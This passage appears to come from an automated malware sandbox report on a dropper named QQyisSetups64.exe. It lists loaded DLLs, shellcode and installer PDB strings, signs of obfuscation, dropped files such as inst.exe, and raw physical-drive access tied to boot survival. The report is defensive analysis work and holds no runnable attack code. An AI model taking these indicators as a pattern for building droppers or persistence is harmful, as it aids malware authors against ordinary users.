                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kdscli.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                          Source: C:\Users\user\Downloads\inst.exeSection loaded: apphelp.dllJump to behavior
                          Source: C:\Users\user\Downloads\inst.exeSection loaded: msimg32.dllJump to behavior
                          Source: C:\Users\user\Downloads\inst.exeSection loaded: version.dllJump to behavior
                          Source: C:\Users\user\Downloads\inst.exeSection loaded: iphlpapi.dllJump to behavior
                          Source: C:\Users\user\Downloads\inst.exeSection loaded: wininet.dllJump to behavior
                          Source: C:\Users\user\Downloads\inst.exeSection loaded: urlmon.dllJump to behavior
                          Source: C:\Users\user\Downloads\inst.exeSection loaded: iertutil.dllJump to behavior
                          Source: C:\Users\user\Downloads\inst.exeSection loaded: srvcli.dllJump to behavior
                          Source: C:\Users\user\Downloads\inst.exeSection loaded: netutils.dllJump to behavior
                          Source: C:\Users\user\Downloads\inst.exeSection loaded: kernel.appcore.dllJump to behavior
                          Source: C:\Users\user\Downloads\inst.exeSection loaded: uxtheme.dllJump to behavior
                          Source: C:\Users\user\Downloads\inst.exeSection loaded: firewallapi.dllJump to behavior
                          Source: C:\Users\user\Downloads\inst.exeSection loaded: dnsapi.dllJump to behavior
                          Source: C:\Users\user\Downloads\inst.exeSection loaded: fwbase.dllJump to behavior
                          Source: C:\Users\user\Downloads\inst.exeSection loaded: fwpolicyiomgr.dllJump to behavior
                          Source: C:\Users\user\Downloads\inst.exeSection loaded: sspicli.dllJump to behavior
                          Source: C:\Users\user\Downloads\inst.exeSection loaded: windows.storage.dllJump to behavior
                          Source: C:\Users\user\Downloads\inst.exeSection loaded: wldp.dllJump to behavior
                          Source: C:\Users\user\Downloads\inst.exeSection loaded: profapi.dllJump to behavior
                          Source: C:\Users\user\Downloads\inst.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                          Source: C:\Users\user\Downloads\inst.exeSection loaded: winhttp.dllJump to behavior
                          Source: C:\Users\user\Downloads\inst.exeSection loaded: mswsock.dllJump to behavior
                          Source: C:\Users\user\Downloads\inst.exeSection loaded: winnsi.dllJump to behavior
                          Source: C:\Users\user\Downloads\inst.exeSection loaded: rasadhlp.dllJump to behavior
                          Source: C:\Users\user\Downloads\inst.exeSection loaded: cabinet.dllJump to behavior
                          Source: C:\Users\user\Downloads\inst.exeSection loaded: fwpuclnt.dllJump to behavior
                          Source: C:\Users\user\Downloads\inst.exeSection loaded: netapi32.dllJump to behavior
                          Source: C:\Users\user\Downloads\inst.exeSection loaded: secur32.dllJump to behavior
                          Source: C:\Users\user\Downloads\inst.exeSection loaded: rasapi32.dllJump to behavior
                          Source: C:\Users\user\Downloads\inst.exeSection loaded: rasman.dllJump to behavior
                          Source: C:\Users\user\Downloads\inst.exeSection loaded: dhcpcsvc.dllJump to behavior
                          Source: C:\Users\user\Downloads\inst.exeSection loaded: napinsp.dllJump to behavior
                          Source: C:\Users\user\Downloads\inst.exeSection loaded: pnrpnsp.dllJump to behavior
                          Source: C:\Users\user\Downloads\inst.exeSection loaded: wshbth.dllJump to behavior
                          Source: C:\Users\user\Downloads\inst.exeSection loaded: nlaapi.dllJump to behavior
                          Source: C:\Users\user\Downloads\inst.exeSection loaded: winrnr.dllJump to behavior
                          Source: C:\Users\user\Downloads\inst.exeSection loaded: rtutils.dllJump to behavior
                          Source: C:\Users\user\Downloads\inst.exeSection loaded: dhcpcsvc6.dllJump to behavior
                          Source: C:\Users\user\Downloads\inst.exeSection loaded: cabinet.dllJump to behavior
                          Source: C:\Users\user\Downloads\inst.exeSection loaded: wbemcomn.dllJump to behavior
                          Source: C:\Users\user\Downloads\inst.exeSection loaded: amsi.dllJump to behavior
                          Source: C:\Users\user\Downloads\inst.exeSection loaded: userenv.dllJump to behavior
                          Source: C:\Users\user\Downloads\inst.exeSection loaded: propsys.dllJump to behavior
                          Source: C:\Users\user\Downloads\inst.exeSection loaded: windows.fileexplorer.common.dllJump to behavior
                          Source: C:\Users\user\Downloads\inst.exeSection loaded: ntshrui.dllJump to behavior
                          Source: C:\Users\user\Downloads\inst.exeSection loaded: cscapi.dllJump to behavior
                          Source: C:\Users\user\Downloads\inst.exeSection loaded: ntmarta.dllJump to behavior
                          Source: C:\Users\user\Downloads\inst.exeSection loaded: linkinfo.dllJump to behavior
                          Source: C:\Users\user\Downloads\inst.exeSection loaded: winmm.dllJump to behavior
                          Source: C:\Users\user\Downloads\inst.exeSection loaded: windowscodecs.dllJump to behavior
                          Source: C:\Users\user\Downloads\inst.exeSection loaded: textinputframework.dllJump to behavior
                          Source: C:\Users\user\Downloads\inst.exeSection loaded: coreuicomponents.dllJump to behavior
                          Source: C:\Users\user\Downloads\inst.exeSection loaded: coremessaging.dllJump to behavior
                          Source: C:\Users\user\Downloads\inst.exeSection loaded: coremessaging.dllJump to behavior
                          Source: C:\Users\user\Downloads\inst.exeSection loaded: wintypes.dllJump to behavior
                          Source: C:\Users\user\Downloads\inst.exeSection loaded: wintypes.dllJump to behavior
                          Source: C:\Users\user\Downloads\inst.exeSection loaded: wintypes.dllJump to behavior
                          Source: C:\Users\user\Downloads\inst.exeSection loaded: dwrite.dllJump to behavior
                          Source: C:\Users\user\Downloads\inst.exeSection loaded: textshaping.dllJump to behavior
                          Source: C:\Users\user\Downloads\inst.exeSection loaded: cabinet.dllJump to behavior
                          Source: C:\Users\user\Downloads\inst.exeSection loaded: msimg32.dll
                          Source: C:\Users\user\Downloads\inst.exeSection loaded: version.dll
                          Source: C:\Users\user\Downloads\inst.exeSection loaded: iphlpapi.dll
                          Source: C:\Users\user\Downloads\inst.exeSection loaded: wininet.dll
                          Source: C:\Users\user\Downloads\inst.exeSection loaded: urlmon.dll
                          Source: C:\Users\user\Downloads\inst.exeSection loaded: iertutil.dll
                          Source: C:\Users\user\Downloads\inst.exeSection loaded: srvcli.dll
                          Source: C:\Users\user\Downloads\inst.exeSection loaded: netutils.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: qmgr.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: bitsperf.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: xmllite.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: firewallapi.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: esent.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: umpdc.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: dnsapi.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: iphlpapi.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: fwbase.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: ntmarta.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: flightsettings.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: netprofm.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: npmproxy.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: bitsigd.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: upnp.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: ssdpapi.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: urlmon.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: iertutil.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: srvcli.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: appxdeploymentclient.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: cryptbase.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: wsmauto.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: miutils.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: wsmsvc.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: dsrole.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: pcwum.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: mi.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: gpapi.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: wkscli.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: msv1_0.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: ntlmshared.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: cryptdll.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: webio.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: mswsock.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: winnsi.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: rasadhlp.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: fwpuclnt.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: rmclient.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: usermgrcli.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: execmodelclient.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: propsys.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: coremessaging.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: twinapi.appcore.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: onecorecommonproxystub.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: execmodelproxy.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: resourcepolicyclient.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: vssapi.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: vsstrace.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: samcli.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: samlib.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: es.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: bitsproxy.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc6.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: schannel.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: mskeyprotect.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: ntasn1.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: ncrypt.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: ncryptsslp.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: msasn1.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: cryptsp.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: rsaenh.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: dpapi.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: mpr.dll
                          Source: C:\Users\user\Desktop\QQyisSetups64.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
                          Source: C:\Users\user\Downloads\inst.exeFile written: C:\Users\user\AppData\Local\Temp\!@t97F6.tmp.dir\setup.iniJump to behavior
                          Source: Window RecorderWindow detected: More than 3 window changes detected
                          Source: C:\Users\user\Downloads\inst.exeWindow detected: Number of UI elements: 24
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                          Source: QQyisSetups64.exeStatic PE information: Virtual size of .text is bigger than: 0x100000
                          Source: QQyisSetups64.exeStatic file information: File size 5289240 > 1048576
                          Source: QQyisSetups64.exeStatic PE information: Raw size of .text is bigger than: 0x100000 < 0x2d9400
                          Source: QQyisSetups64.exeStatic PE information: Raw size of .rsrc is bigger than: 0x100000 < 0x1ef400
                          Source: Binary string: \Release\Code_Shellcode.pdb source: QQyisSetups64.exe, QQyisSetups64.exe, 00000003.00000002.1462038578.0000000010012000.00000002.00001000.00020000.00000000.sdmp, QQyisSetups64.exe, 00000003.00000002.1460885320.0000000002860000.00000040.00001000.00020000.00000000.sdmp
                          Source: Binary string: C:\vmagent_new\bin\joblist\249110\out\Release\360P2SP.pdb source: inst.exe, 0000000F.00000002.2579307301.000000006D41F000.00000002.00000001.01000000.0000000E.sdmp, inst.exe, 0000000F.00000003.1479329612.0000000003991000.00000004.00000020.00020000.00000000.sdmp, 360P2SP.dll.15.dr
                          Source: Binary string: c:\vmagent_new\bin\joblist\312713\out\Release\sites.pdbX source: inst.exe, 0000000F.00000002.2578764889.000000006C6B5000.00000002.00000001.01000000.0000000F.sdmp, sites.dll.15.dr
                          Source: Binary string: Attempt to access uninitialized member object: TVEProcessPacket.PdbForwarderContext source: QQyisSetups64.exe, QQyisSetups64.exe.3.dr
                          Source: Binary string: SAttempt to access uninitialized member object: TVEProcessPacket.PdbForwarderContextSVWU source: QQyisSetups64.exe, QQyisSetups64.exe.3.dr
                          Source: Binary string: \Release\Code_Shellcode.pdb(!!GCTL source: QQyisSetups64.exe, 00000003.00000002.1462038578.0000000010012000.00000002.00001000.00020000.00000000.sdmp, QQyisSetups64.exe, 00000003.00000002.1460885320.0000000002860000.00000040.00001000.00020000.00000000.sdmp
                          Source: Binary string: c:\vmagent_new\bin\joblist\312713\out\Release\sites.pdb source: inst.exe, inst.exe, 0000000F.00000002.2578764889.000000006C6B5000.00000002.00000001.01000000.0000000F.sdmp, sites.dll.15.dr
                          Source: Binary string: C:\vmagent_new\bin\joblist\832091\out\Release\360Installer.pdb source: inst.exe, 0000000F.00000000.1438646907.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmp, inst.exe, 0000000F.00000002.2571976270.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmp, inst.exe, 00000010.00000000.1445063642.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmp, inst.exe, 00000010.00000002.1460315654.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmp, inst.exe.3.dr, inst[1].exe.3.dr

                          Data Obfuscation

                          barindex
                          Source: C:\Users\user\Desktop\QQyisSetups64.exeUnpacked PE file: 3.2.QQyisSetups64.exe.400000.0.unpack
                          Source: C:\Users\user\Desktop\QQyisSetups64.exeCode function: 3_2_10001170 LoadLibraryW,GetProcAddress,GetProcAddress,GetModuleHandleA,RegisterClassW,CreateWindowExW,GetMessageW,TranslateMessage,DispatchMessageW,3_2_10001170
                          Source: QQyisSetups64.exeStatic PE information: real checksum: 0x5142eb should be: 0x5110e9
                          Source: QQyisSetups64.exe.3.drStatic PE information: real checksum: 0x5142eb should be: 0x5110e9
                          Source: C:\Users\user\AppData\Roaming\QQyisSetups64.exeCode function: 6_2_03794345 push ecx; ret 6_2_03794358
                          Source: C:\Users\user\AppData\Roaming\QQyisSetups64.exeCode function: 6_2_037AA168 push eax; ret 6_2_037AA119
                          Source: C:\Users\user\AppData\Roaming\QQyisSetups64.exeCode function: 6_2_037AA0B8 push eax; ret 6_2_037AA119
                          Source: C:\Users\user\AppData\Roaming\QQyisSetups64.exeCode function: 6_2_037A2470 push ebp; retf 6_2_037A2474
                          Source: C:\Users\user\AppData\Roaming\QQyisSetups64.exeCode function: 6_2_037A2450 push ebp; retf 6_2_037A2474
                          Source: C:\Users\user\AppData\Roaming\QQyisSetups64.exeCode function: 6_2_037A2438 push ebp; retf 6_2_037A2474
                          Source: C:\Users\user\AppData\Roaming\QQyisSetups64.exeCode function: 6_2_02C9FE9A push ecx; ret 6_2_02C9FEBF
                          Source: C:\Users\user\AppData\Roaming\QQyisSetups64.exeCode function: 6_2_02C89DF5 push ecx; ret 6_2_02C89E08
                          Source: C:\Users\user\AppData\Roaming\QQyisSetups64.exeCode function: 6_2_0288CAFF push eax; retf 6_2_0288CB00
                          Source: C:\Users\user\AppData\Roaming\QQyisSetups64.exeCode function: 6_2_0288CB0B push 701000CBh; retf 6_2_0288CB10
                          Source: C:\Users\user\AppData\Roaming\QQyisSetups64.exeCode function: 6_2_0288CB07 pushad ; retf 6_2_0288CB08
                          Source: C:\Users\user\AppData\Roaming\QQyisSetups64.exeCode function: 6_2_0288CB61 pushfd ; retf 6_2_0288CB64
                          Source: C:\Users\user\AppData\Roaming\QQyisSetups64.exeCode function: 6_2_02889DCC push ecx; ret 6_2_02889DDF
                          Source: C:\Users\user\AppData\Roaming\QQyisSetups64.exeCode function: 6_2_03613D04 push ecx; ret 6_2_03613D17
                          Source: C:\Users\user\Downloads\inst.exeCode function: 15_2_00AF4821 push ecx; ret 15_2_00AF4834
                          Source: C:\Users\user\Downloads\inst.exeCode function: 15_2_00AF54F9 push ecx; ret 15_2_00AF550C
                          Source: C:\Users\user\Downloads\inst.exeCode function: 15_2_00A87330 push ecx; mov dword ptr [esp], 00000000h15_2_00A87331
                          Source: C:\Users\user\Downloads\inst.exeCode function: 15_2_00A739B0 push ecx; mov dword ptr [esp], 00000000h15_2_00A739B1
                          Source: C:\Users\user\Downloads\inst.exeCode function: 15_2_00A73C30 push ecx; mov dword ptr [esp], 00000000h15_2_00A73C31
                          Source: C:\Users\user\Downloads\inst.exeCode function: 15_2_6C68E944 push ecx; ret 15_2_6C68E957
                          Source: C:\Users\user\Downloads\inst.exeCode function: 15_2_6C5D2500 push ecx; mov dword ptr [esp], 00000000h15_2_6C5D2501
                          Source: C:\Users\user\Downloads\inst.exeCode function: 16_2_00AF4821 push ecx; ret 16_2_00AF4834
                          Source: C:\Users\user\Downloads\inst.exeCode function: 16_2_00A87330 push ecx; mov dword ptr [esp], 00000000h16_2_00A87331
                          Source: C:\Users\user\Downloads\inst.exeCode function: 16_2_00AF54F9 push ecx; ret 16_2_00AF550C
                          Source: C:\Users\user\Downloads\inst.exeCode function: 16_2_00A739B0 push ecx; mov dword ptr [esp], 00000000h16_2_00A739B1
                          Source: C:\Users\user\Downloads\inst.exeCode function: 16_2_00A73C30 push ecx; mov dword ptr [esp], 00000000h16_2_00A73C31

                          Persistence and Installation Behavior

                          barindex
                          Source: C:\Users\user\Downloads\inst.exeCode function: _memset,CreateFileW,_memset,DeviceIoControl,_memset,_memcpy_s,CloseHandle, \\.\PHYSICALDRIVE%d15_2_00AE18BD
                          Source: C:\Users\user\Downloads\inst.exeCode function: _memset,CreateFileW,_memset,DeviceIoControl,_memset,_memcpy_s,CloseHandle, \\.\PHYSICALDRIVE%d15_2_00AE1A51
                          Source: C:\Users\user\Downloads\inst.exeCode function: _memset,CreateFileW,_memset,DeviceIoControl,CloseHandle, \\.\PHYSICALDRIVE%d15_2_00AE1BEB
                          Source: C:\Users\user\Downloads\inst.exeCode function: __EH_prolog3,CreateFileW,_memset,DeviceIoControl,_memset,CloseHandle, \\.\PHYSICALDRIVE%d15_2_00AE2158
                          Source: C:\Users\user\Downloads\inst.exeCode function: CreateFileA,CreateFileA,DeviceIoControl,CloseHandle,_memset,CloseHandle, \\.\PhysicalDrive%d15_2_00AF2210
                          Source: C:\Users\user\Downloads\inst.exeCode function: CreateFileA,CreateFileA,_memset,DeviceIoControl,_memset,CloseHandle, \\.\PhysicalDrive%d15_2_00AF25D0
                          Source: C:\Users\user\Downloads\inst.exeCode function: _malloc,SetLastError,CreateFileA,_memset,DeviceIoControl,CloseHandle, \\.\PhysicalDrive%d15_2_00A766F0
                          Source: C:\Users\user\Downloads\inst.exeCode function: DeviceIoControl,CreateFileA,DeviceIoControl,_malloc,DeviceIoControl,CloseHandle, \\.\PhysicalDrive%d15_2_00AF2760
                          Source: C:\Users\user\Downloads\inst.exeCode function: CreateFileA,_memset,DeviceIoControl,CloseHandle, \\.\PhysicalDrive%d15_2_00A76759
                          Source: C:\Users\user\Downloads\inst.exeCode function: CreateFileW,DeviceIoControl,DeviceIoControl,CloseHandle,_memset,DeviceIoControl,CloseHandle, \\.\PhysicalDrive%d15_2_00A868A0
                          Source: C:\Users\user\Downloads\inst.exeCode function: CreateFileW,_memset,DeviceIoControl,CloseHandle,_memset,_memset,StrTrimA,StrTrimA,CloseHandle, \\.\PhysicalDrive%d15_2_00A86AE0
                          Source: C:\Users\user\Downloads\inst.exeCode function: RegQueryValueExW,_malloc,SetLastError,CreateFileA,_memset,DeviceIoControl,CloseHandle, \\.\PhysicalDrive%d15_2_6C5D42E0
                          Source: C:\Users\user\Downloads\inst.exeCode function: CreateFileA,_memset,DeviceIoControl,CloseHandle, \\.\PhysicalDrive%d15_2_6C5D4349
                          Source: C:\Users\user\Downloads\inst.exeCode function: __EH_prolog3,CreateFileW,_memset,DeviceIoControl,_memset,CloseHandle, \\.\PHYSICALDRIVE%d16_2_00AE2158
                          Source: C:\Users\user\Downloads\inst.exeCode function: CreateFileA,CreateFileA,DeviceIoControl,CloseHandle,_memset,CloseHandle, \\.\PhysicalDrive%d16_2_00AF2210
                          Source: C:\Users\user\Downloads\inst.exeCode function: CreateFileA,CreateFileA,_memset,DeviceIoControl,_memset,CloseHandle, \\.\PhysicalDrive%d16_2_00AF25D0
                          Source: C:\Users\user\Downloads\inst.exeCode function: SetLastError,CreateFileA,_memset,DeviceIoControl,CloseHandle, \\.\PhysicalDrive%d16_2_00A766F0
                          Source: C:\Users\user\Downloads\inst.exeCode function: DeviceIoControl,CreateFileA,DeviceIoControl,DeviceIoControl,CloseHandle, \\.\PhysicalDrive%d16_2_00AF2760
                          Source: C:\Users\user\Downloads\inst.exeCode function: CreateFileA,_memset,DeviceIoControl,CloseHandle, \\.\PhysicalDrive%d16_2_00A76759
                          Source: C:\Users\user\Downloads\inst.exeCode function: CreateFileW,DeviceIoControl,DeviceIoControl,CloseHandle,_memset,DeviceIoControl,CloseHandle, \\.\PhysicalDrive%d16_2_00A868A0
                          Source: C:\Users\user\Downloads\inst.exeCode function: CreateFileW,_memset,DeviceIoControl,CloseHandle,_memset,_memset,StrTrimA,StrTrimA,CloseHandle, \\.\PhysicalDrive%d16_2_00A86AE0
                          Source: C:\Users\user\Downloads\inst.exeCode function: _memset,CreateFileW,_memset,DeviceIoControl,_memset,_memcpy_s,CloseHandle, \\.\PHYSICALDRIVE%d16_2_00AE18BD
                          Source: C:\Users\user\Downloads\inst.exeCode function: _memset,CreateFileW,_memset,DeviceIoControl,_memset,_memcpy_s,CloseHandle, \\.\PHYSICALDRIVE%d16_2_00AE1A51
                          Source: C:\Users\user\Downloads\inst.exeCode function: _memset,CreateFileW,_memset,DeviceIoControl,CloseHandle, \\.\PHYSICALDRIVE%d16_2_00AE1BEB
                          Source: C:\Users\user\Desktop\QQyisSetups64.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\inst[1].exeJump to dropped file
                          Source: C:\Users\user\Downloads\inst.exeFile created: C:\Users\user\AppData\Local\Temp\{A44B7723-4283-41b8-B9C0-6B1983C61382}.tmp\sites.dllJump to dropped file
                          Source: C:\Users\user\Desktop\QQyisSetups64.exeFile created: C:\Users\user\Downloads\inst.exeJump to dropped file
                          Source: C:\Users\user\Downloads\inst.exeFile created: C:\Users\user\AppData\Local\Temp\{530B0790-97BF-4550-8023-6D8CB41E16CA}.tmp\360P2SP.dllJump to dropped file
                          Source: C:\Users\user\Desktop\QQyisSetups64.exeFile created: C:\Users\user\AppData\Roaming\QQyisSetups64.exeJump to dropped file
                          Source: C:\Users\user\Downloads\inst.exeCode function: 15_2_00ADDA24 GetPrivateProfileStringW,15_2_00ADDA24
                          Source: C:\Users\user\Downloads\inst.exeCode function: 15_2_00AA9A0C _memset,SHGetValueW,PathAppendW,PathAppendW,PathAppendW,PathFileExistsW,GetPrivateProfileIntW,__time64,15_2_00AA9A0C
                          Source: C:\Users\user\Downloads\inst.exeCode function: 16_2_00ADDA24 GetPrivateProfileStringW,16_2_00ADDA24
                          Source: C:\Users\user\Downloads\inst.exeCode function: 16_2_00AA9A0C _memset,SHGetValueW,PathAppendW,PathAppendW,PathAppendW,PathFileExistsW,GetPrivateProfileIntW,__time64,16_2_00AA9A0C
                          Source: C:\Users\user\Desktop\QQyisSetups64.exeFile created: C:\Users\user\Desktop\Logs\QQyisSetups64.logJump to behavior
                          Source: C:\Users\user\AppData\Roaming\QQyisSetups64.exeFile created: C:\Users\user\AppData\Roaming\Logs\QQyisSetups64.logJump to behavior

                          Boot Survival

                          barindex
                          Source: C:\Users\user\Downloads\inst.exeCode function: _memset,CreateFileW,_memset,DeviceIoControl,_memset,_memcpy_s,CloseHandle, \\.\PHYSICALDRIVE%d15_2_00AE18BD
